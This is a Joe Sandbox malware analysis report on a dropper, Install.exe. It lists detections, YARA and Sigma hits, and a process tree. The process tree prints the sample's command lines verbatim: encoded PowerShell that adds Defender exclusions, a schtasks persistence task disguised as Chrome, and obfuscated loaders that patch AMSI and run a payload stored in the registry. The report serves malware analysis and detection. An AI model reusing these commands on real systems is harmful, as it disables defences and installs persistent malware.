Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Install.exe

Overview

General Information

Sample Name:Install.exe
Analysis ID:597646
MD5:280bfd5ea1f41586ea0ef60ee44bc8db
SHA1:57aa866f42bccbaceed938390001148323d033c1
SHA256:a6ca5523fce6a4a43964319c35ecb868186465309e9226ab07c158519a5ef6f9
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Hooks registry keys query functions (used to hide registry keys)
Uses nslookup.exe to query domains
Encrypted powershell cmdline option found
Allocates memory in foreign processes
Creates files in the system32 config directory
Hooks processes query functions (used to hide processes)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious Svchost Process
Creates a thread in another existing process (thread injection)
Hooks files or directories query functions (used to hide files and directories)
Uses schtasks.exe or at.exe to add and modify task schedules
Found suspicious powershell code related to unpacking or dynamic code loading
Writes to foreign memory regions
.NET source code references suspicious native API functions
Very long command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Potential dropper URLs found in powershell memory
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
PE file contains sections with non-standard names
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Creates job files (autostart)
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (may stop execution after accessing registry keys)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Suspicious Execution of Powershell with Base64

Classification

Process Tree

  • System is w10x64
  • Install.exe (PID: 6752 cmdline: "C:\Users\user\Desktop\Install.exe" MD5: 280BFD5EA1F41586EA0EF60EE44BC8DB)
    • ChiefKeefofficialnaxyi_crypted(6).exe (PID: 6820 cmdline: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe MD5: D55DC38B4EE6BED2168E74194533C572)
      • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • AppLaunch.exe (PID: 6900 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
    • 34432.exe (PID: 6836 cmdline: C:\Users\user\AppData\Roaming\34432.exe MD5: 04F6704BD3AB97905A497BAF3D7FDB3C)
      • cmd.exe (PID: 7012 cmdline: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 7020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 7048 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" MD5: 95000560239032BC68B4C2FDFCDEF913)
        • powershell.exe (PID: 6856 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" MD5: 95000560239032BC68B4C2FDFCDEF913)
      • nslookup.exe (PID: 7056 cmdline: C:\Windows\System32\nslookup.exe MD5: AF1787F1DBE0053D74FC687E7233F8CE)
      • cmd.exe (PID: 5412 cmdline: cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 1584 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • cmd.exe (PID: 6552 cmdline: cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • chrome.exe (PID: 5460 cmdline: C:\Users\user\AppData\Roaming\Chrome\chrome.exe MD5: 04F6704BD3AB97905A497BAF3D7FDB3C)
          • cmd.exe (PID: 6892 cmdline: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
            • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • powershell.exe (PID: 5728 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" MD5: 95000560239032BC68B4C2FDFCDEF913)
  • powershell.exe (PID: 6372 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • powershell.exe (PID: 6940 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)" MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 2280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • dllhost.exe (PID: 2324 cmdline: C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9} MD5: 2528137C6745C4EADD87817A1909677E)
      • winlogon.exe (PID: 572 cmdline: winlogon.exe MD5: F9017F2DC455AD373DF036F5817A8870)
      • lsass.exe (PID: 612 cmdline: C:\Windows\system32\lsass.exe MD5: 317340CD278A374BCEF6A30194557227)
      • svchost.exe (PID: 724 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 900 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • dwm.exe (PID: 984 cmdline: dwm.exe MD5: 70073A05B2B43FFB7A625708BB29E7C7)
  • chrome.exe (PID: 6564 cmdline: C:\Users\user\AppData\Roaming\Chrome\chrome.exe MD5: 04F6704BD3AB97905A497BAF3D7FDB3C)
    • cmd.exe (PID: 3784 cmdline: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 4916 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\34432.exeSUSP_NET_NAME_ConfuserExDetects ConfuserEx packed fileArnim Rupp
  • 0x240fc9:$name: ConfuserEx
  • 0x240951:$compile: AssemblyTitle
C:\Users\user\AppData\Roaming\Chrome\chrome.exeSUSP_NET_NAME_ConfuserExDetects ConfuserEx packed fileArnim Rupp
  • 0x240fc9:$name: ConfuserEx
  • 0x240951:$compile: AssemblyTitle

Unpacked PEs

SourceRuleDescriptionAuthorStrings
33.2.chrome.exe.fa0000.0.unpackSUSP_NET_NAME_ConfuserExDetects ConfuserEx packed fileArnim Rupp
  • 0x240fc9:$name: ConfuserEx
  • 0x240951:$compile: AssemblyTitle
30.0.chrome.exe.20000.0.unpackSUSP_NET_NAME_ConfuserExDetects ConfuserEx packed fileArnim Rupp
  • 0x240fc9:$name: ConfuserEx
  • 0x240951:$compile: AssemblyTitle
30.2.chrome.exe.20000.0.unpackSUSP_NET_NAME_ConfuserExDetects ConfuserEx packed fileArnim Rupp
  • 0x240fc9:$name: ConfuserEx
  • 0x240951:$compile: AssemblyTitle
4.0.34432.exe.770000.0.unpackSUSP_NET_NAME_ConfuserExDetects ConfuserEx packed fileArnim Rupp
  • 0x240fc9:$name: ConfuserEx
  • 0x240951:$compile: AssemblyTitle
4.2.34432.exe.770000.0.unpackSUSP_NET_NAME_ConfuserExDetects ConfuserEx packed fileArnim Rupp
  • 0x240fc9:$name: ConfuserEx
  • 0x240951:$compile: AssemblyTitle
Click to see the 1 entries

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious Svchost Process
Source: Process startedAuthor: Florian Roth: Data: Command: c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay, CommandLine: c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 2324, ParentProcessName: dllhost.exe, ProcessCommandLine: c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay, ProcessId: 724, ProcessName: svchost.exe
Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke (rule): Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, QueryName: ip-api.com
Source: Process startedAuthor: frack113: Data: Command: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , CommandLine: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7012, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , ProcessId: 7048, ProcessName: powershell.exe
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\Install.exe, ProcessId: 6752, TargetFilename: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , CommandLine: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7012, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , ProcessId: 7048, ProcessName: powershell.exe
Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132928152596023668.7048.DefaultAppDomain.powershell

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\34432.exeAvira: detection malicious, Label: HEUR/AGEN.1221921
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeAvira: detection malicious, Label: HEUR/AGEN.1221921
Multi AV Scanner detection for submitted file
Source: Install.exeVirustotal: Detection: 41%Perma Link
Source: Install.exeReversingLabs: Detection: 73%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\34432.exeVirustotal: Detection: 34%Perma Link
Source: C:\Users\user\AppData\Roaming\34432.exeReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeVirustotal: Detection: 50%Perma Link
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeReversingLabs: Detection: 76%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\34432.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeJoe Sandbox ML: detected
Source: 22.0.nslookup.exe.140000000.2.unpackAvira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.10.unpackAvira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.0.unpackAvira: Label: TR/Injector.vwktt
Source: 22.0.nslookup.exe.140000000.8.unpackAvira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.3.unpackAvira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.1.unpackAvira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.4.unpackAvira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.5.unpackAvira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.1.unpackAvira: Label: RKIT/Agent.avskt
Source: 39.0.dllhost.exe.140000000.8.unpackAvira: Label: RKIT/Agent.avskt
Source: 22.2.nslookup.exe.140000000.0.unpackAvira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.5.unpackAvira: Label: RKIT/Agent.avskt
Source: 39.2.dllhost.exe.140000000.0.unpackAvira: Label: RKIT/Agent.avskt
Source: 39.0.dllhost.exe.140000000.12.unpackAvira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.6.unpackAvira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.0.unpackAvira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.10.unpackAvira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.6.unpackAvira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.12.unpackAvira: Label: TR/Injector.vwktt
Source: 22.0.nslookup.exe.140000000.3.unpackAvira: Label: TR/Injector.vwktt
Source: 22.0.nslookup.exe.140000000.4.unpackAvira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.2.unpackAvira: Label: RKIT/Agent.avskt
Source: Install.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Install.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: x64\Release\r77-x64.pdb source: svchost.exe
